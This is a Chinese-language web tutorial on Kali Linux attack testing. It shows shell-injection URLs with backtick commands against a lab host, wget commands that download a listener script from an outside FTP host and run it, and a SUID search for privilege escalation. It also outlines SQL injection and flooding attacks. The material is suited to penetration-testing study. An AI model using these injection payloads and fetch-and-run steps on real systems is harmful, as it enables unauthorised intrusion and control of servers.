您当前的位置:首页 > 电脑百科 > 安全防护 > 服务器/网站

Kali Linux(注入与攻击测试篇)

时间:2019-12-06 10:03:07  来源:  作者:

通过前面的端口扫描和Web扫描等工具,知道知道目标主机有什么样的弱点,那么,下一步就是如何注入代码控制或者攻击该目标主机。

 

Shell injection(命令行注入)

一旦脚本或是代码处理不当,就会将用户的输入参数(如HTTP参数、页面中的输入字段等)作为系统命令进行执行,而这些通过shell命令或脚本,你可以收集任何想要的信息,达到权限提升或是上传文件的目的,一旦成功,该目标的生死就不由它了。

通过nmap扫描,我们知道目标主机(172.12.0.2)存在哪些开发端口,启用了什么服务。然后,我们看见目标主机的80端口是开发,再用web分析扫描工具,获得该站点的目录和弱点信息, 如,我们通过skipfish扫描到目标主机存在如下弱点:

Kali Linux(注入与攻击测试篇)

#skipfish扫描报告

一般情况下,通过Web界面登录的用户都是系统内嵌的一些用户,如Apache等,如果你足够幸运,程序员会把错误日志一起带回页面来显示,那么你就能通过如下URL获得一些信息:

http://172.12.0.2/~/xxd.sh?auth_name=user01&user_mac=`whoami`

 

Kali Linux(注入与攻击测试篇)

#获得当前用户名信息

Pwd能知道当前的位置, sudo –l能知道该账户的权限, lsof能知道该用户对文件的权限情况。

 http://172.12.0.2/~/xxd.sh?auth_name=user01&user_mac=`sudo -l`
Kali Linux(注入与攻击测试篇)

#当前用户的权限信息

如果你发现页面中存在文件上传等能写入系统的操作,很大几率你能找到如何把文件上传上去,实在不行,你可以把文件放在/tmp目录下,做后续的操作

http://172.12.0.2/~/xxd.sh?auth_name=&user_mac=`wget -nH -m --ftp-user=admin --ftp-password=admins -P /tmp ftp://10.10.11.250/test.txt`
Kali Linux(注入与攻击测试篇)

#成功上传的文件

是时候展现技术的时候了,干一点创造性的工作: reboot:

http://172.12.0.2/~/xxd.sh?auth_name=&user_mac=`reboot`
Kali Linux(注入与攻击测试篇)

#权限不够导致命令执行失败

非常遗憾,ping没断,设备没死:这就进入了另一个高深的话题:权限提升的问题。

 

权限提升

在进行权限提升工作前,我们先做一点小工具,让我们能像登录设备一样进行一些命令行操作。

如,上传一个随便编写的Python脚本(进行TCP监听,并解析用户的输入,进行系统命令执行, 将执行结果返回到客户端), 脚本通过上面的wget放到/tmp目录下,通过chmod 777修改权限,再执行脚本(加&使其后台运行):

http://172.12.0.2/~/xxd.sh?auth_name=&user_mac=`wget -nH -m --ftp-user=admin --ftp-password=admins -P /tmp ftp://10.10.11.250:/server.py`
http://172.12.0.2/~/xxd.sh?auth_name=&user_mac=`chmod 777 /tmp/server.py`
http://172.12.0.2/~/xxd.sh?auth_name=&user_mac=`/tmp/server.py &`

我这里只是简单的一个python脚本作为演示用:

Kali Linux(注入与攻击测试篇)

#server.py


Kali Linux(注入与攻击测试篇)

#client.py

OK, 连接后,第一件事儿就是试图把用户信息拿回来(试图用密码破解方式尝试一下破解系统的密码)

Kali Linux(注入与攻击测试篇)

#还记得大明湖畔的夏雨荷吗?

权限提升最好的方法是利用系统中的一些错误配置,如:

  • 用户home目录的权限配置错误: 如755, 777权限的文件

ls –l可见文件和目录的权限信息:

 

Kali Linux(注入与攻击测试篇)

#文件的权限查看

“-rw-rw-r--”一共10位,最左边表示类型(目录、文件、连接等), 接着三位是所有者的权限, 接着三位是组群的权限,最后是其它用户的权限(r读、w写、x执行,-未授权)。开发者或是管理员会在自己的目录下包含一些敏感信息或是给自己提供方便,将文件的权限提升很大,利用好会省去很多时间。

 

  • Getgid和setuid可执行程序

一个文件具有Set uid bit能力意味着它能潜在的运行在更高权限上(如root),如果你能找到这些应用程序的弱点或是试图崩溃,那么你就有可能获得root权限。如: 查找系统中具有STUID权限的文件

find / -perm -u=s -type f 2>/dev/null

 

Kali Linux(注入与攻击测试篇)

#具有setuid能力的文件查询

 

  • 安全性低的服务

有些Server上,并没有去掉不必要的服务,而这些服务以缺省配置在运行,通过cat /etc/services可见所有的服务。搜索这些服务可能存在的漏洞或缺陷也能提高你的效率。

 

  • 利用溢出进行攻击

站在巨人的肩上,起点就不会低,一些开源的工具或是其更新能帮助你快速获得你想要的东西,如overlayfs(https://www.exploit-db.com/exploits/37292)。

 

SQL注入

SQL注入是想办法将任意SQL代码插入数据库(如MySQL,Oracle,SQL Server或其他)查询语句中,使攻击者能够完全控制Web应用程序后面的数据库服务器。攻击者可以使用SQL注入漏洞绕过应用程序安全措施;可以绕过网页或Web应用程序的身份验证和授权,并检索整个SQL数据库的内容,还可以使用SQL注入来添加,修改和删除数据库中的记录。

利用前面章节提到的SQL注入检测工具查到有潜在可能的页面输入时,构造SQL语句,从而获得数据库的内容后修改其记录。

由于未能扫描到可攻击的对象,无法掩饰这个攻击过程。

 

服务攻击

服务攻击可能在大神的眼中是最没技术含量的事情了:如小偷与抢劫的区别,前者是一个有着悠久技艺传承的职业工种,后者就没什么技术含量了。不过马爸爸几乎断送了前者的职业生涯,让小偷们现在不得不寻求世界文化遗产组织的保护,使得这个自古就有的职业得以延续下去!。

最著名的攻击莫过于syn flooding了(发起大量的TCP syn报文,耗尽服务的连接数,使正常用户不能建立连接)。以次类推的有udp_flooding, 半开连接、icmp_fooding, arp_poison之类的,通过构造报文,撩拨对方,等它正脱裤子时,撒腿就跑。相较而言,这是种流氓行为。但有时候耍流氓确实比较有效,只是我不太喜欢而已。

服务攻的工具网上一搜一大堆,理论上上只要能发包,就能构造各种攻击,这里不再累述。



Tags:Kali Linux   点击:()  评论:()
声明:本站部分内容及图片来自互联网,转载是出于传递更多信息之目的,内容观点仅代表作者本人,如有任何标注错误或版权侵犯请与我们联系(Email:2595517585@qq.com),我们将及时更正、删除,谢谢。
▌相关推荐
一、背景介绍作为一名渗透测试工作人员(或者小白),在我们的日常工作或者学习中,我们不可能时时刻刻将自己的个人电脑(安装好Kali Linux的个人主机)带在身边,当我们没有带自己的个人...【详细内容】
2021-12-27  Tags: Kali Linux  点击:(3)  评论:(0)  加入收藏
上一节中我们学了如何实现ARP断网攻击,本节中我们将利用ARP欺骗的原理实现截取目标计算机图片流量,内容包括:ü如何开启ip转发ü怎样截取受害机图片流量 一、开启ip转...【详细内容】
2021-11-23  Tags: Kali Linux  点击:(23)  评论:(0)  加入收藏
一、VMware部分1、Vmware简介虚拟机就是一个用来模拟真实的物理机环境的一个软件,可以在虚拟机中安装不同版本的操作系统。就是一个把下载好的ISO安装在物理机操作系统的一个...【详细内容】
2021-07-12  Tags: Kali Linux  点击:(113)  评论:(0)  加入收藏
操作系统是负责机器正常运行的主要系统软件。一些操作系统是为某些特定目的而设计的。尽管我们可以将它们用于任何我们想要的东西,但是它们有一些特殊的工具或服务可供其用户...【详细内容】
2021-07-09  Tags: Kali Linux  点击:(120)  评论:(0)  加入收藏
1、攻击windows服务器漏洞用nmap对网段进行扫描nmap -sP 192.168. 在进行IP扫描 发现Windows服务器漏洞步骤:msfconsole---进入渗透模块 search manageengine-------搜索渗透...【详细内容】
2021-06-18  Tags: Kali Linux  点击:(155)  评论:(0)  加入收藏
操作系统是负责机器正常运行的主要系统软件。一些操作系统是为某些特定目的而设计的。尽管我们可以将它们用于任何我们想要的东西,但是它们有一些特殊的工具或服务可供其用户...【详细内容】
2021-02-04  Tags: Kali Linux  点击:(195)  评论:(0)  加入收藏
一、背景介绍Metasploit就是一个漏洞框架。它的全称叫做The Metasploit Framework,简称叫做MSF。Metasploit作为全球最受欢迎的工具,不仅仅是因为它的方便性和强大性,更重要的...【详细内容】
2020-10-19  Tags: Kali Linux  点击:(179)  评论:(0)  加入收藏
本教程将向你展示如何以最快的方式在运行于 Windows 和 Linux 上的 VirtualBox 上安装 Kali Linux。-- Ankush DasKali Linux 是最好的 黑客 和安全爱好者的 Linux 发行版...【详细内容】
2020-08-24  Tags: Kali Linux  点击:(138)  评论:(0)  加入收藏
Kali Linux 2020.1是目前最新的版本,相对于之前的2019版进行了大量的改动,除了组件的常规更新外,还包括默认使用标准的非特权用户(非root用户),官方期望以此来增加系统额外的安全...【详细内容】
2020-07-28  Tags: Kali Linux  点击:(137)  评论:(0)  加入收藏
应用层服务漏洞:服务代码存在漏洞,遇异常提交数据时程序崩溃应用处理大量并发请求能力有限,被拒绝的是应用或OS缓冲区溢出漏洞:向目标函数随机提交数据,特定情况下数据覆盖临近寄...【详细内容】
2020-07-15  Tags: Kali Linux  点击:(146)  评论:(0)  加入收藏
▌简易百科推荐
在最近的一波攻击中,黑客利用多个插件中未修补的漏洞攻击了 160 万个 WordPress 网站。 易受攻击的插件对 WordPress 网站产生了的巨大攻击数据。 Wordfence 最近发现 WordPr...【详细内容】
2021-12-16  蚁安    Tags:WordPress   点击:(9)  评论:(0)  加入收藏
事件起因从安全分析系统里面发现一条带有病毒的下载,然后针对这条记录展开了一系列的分析分析过程1.登录到被感染服务器,查看系统状况,hadoop 这个用户在 2020/6/18 20:32 从这...【详细内容】
2021-11-23  Z2990Lig    Tags:SSH   点击:(32)  评论:(0)  加入收藏
1、除了服务器需要用的一些正规软件,其它都不要安装。2、在用户中把administrator改名,这样做的目的是即使对方暴破了我们的密码用户名也不容易猜住,相当于又加了一道关卡。...【详细内容】
2021-11-01  IT小哥吧    Tags:服务器   点击:(37)  评论:(0)  加入收藏
账户安全(1)更名administrator本地用户并禁用guest账户步骤:点击“开始”,找到“管理工具”,点击里面的“计算机管理”,找到“本地用户和组” (2)设定账户锁定策略尝试5次失败...【详细内容】
2021-10-12  Kali与编程  今日头条  Tags:Windows主机   点击:(62)  评论:(0)  加入收藏
本文主要介绍以Microsoft的Windows Server 2019 ,版本:Datacenter(Domain Controller)安全加固保护.企业随着规模不断扩大,业务增多,信息安全建设是企业里一条只有重点没有终点...【详细内容】
2021-09-17  Vireshark    Tags:服务器安全   点击:(64)  评论:(0)  加入收藏
目录常见共享命令IPC$IPC$的利用条件1:开启了139、445端口2:目标主机开启了IPC$共享3:IPC连接报错IPC空连接空连接可以做什么?(毫无作用)IPC$非空连接IPC$非空连接可以做什么?di...【详细内容】
2021-09-16  网络说安全    Tags:系统安全   点击:(86)  评论:(0)  加入收藏
昨天一个老哥找到我,说他的服务器这几天一直被CC攻击,问我这边有没有什么解决的方法? 近年来,网络攻击事件越来越频繁,最常见的就是CC攻击和DDOS攻击,主要的区别就是针对的对象不...【详细内容】
2021-09-10  小蚁GDRAGON    Tags:cc攻击   点击:(58)  评论:(0)  加入收藏
网站页面上的登录操作,通常都是输入帐号密码,传输至网站后台验证。在网站页面、数据传输中,通过技术手段,都可以得到用户输入的信息,并可以修改,从而发起网络攻击。典型的如:使用自...【详细内容】
2021-08-30  修丹道的程序猿    Tags:登录方式   点击:(62)  评论:(0)  加入收藏
网络安全研究人员披露了一类影响主要 DNS 即服务 (DNSaaS) 提供商的新漏洞,这些漏洞可能允许攻击者从企业网络中窃取敏感信息。基础设施安全公司 Wiz 的研究人员 Shir Tamar...【详细内容】
2021-08-12  零日时代    Tags:漏洞   点击:(66)  评论:(0)  加入收藏
001暴力破解1. 指定用户名爆破密码传统型爆破思路,用户名可以通过猜测或者信息收集获得。猜测:admin、网站域名等信息收集:新闻发布人、whoami等2. 指定密码爆破用户名如果是后...【详细内容】
2021-07-23  KaliMa  今日头条  Tags:登陆框   点击:(85)  评论:(0)  加入收藏
相关文章
    无相关信息
最新更新
栏目热门
栏目头条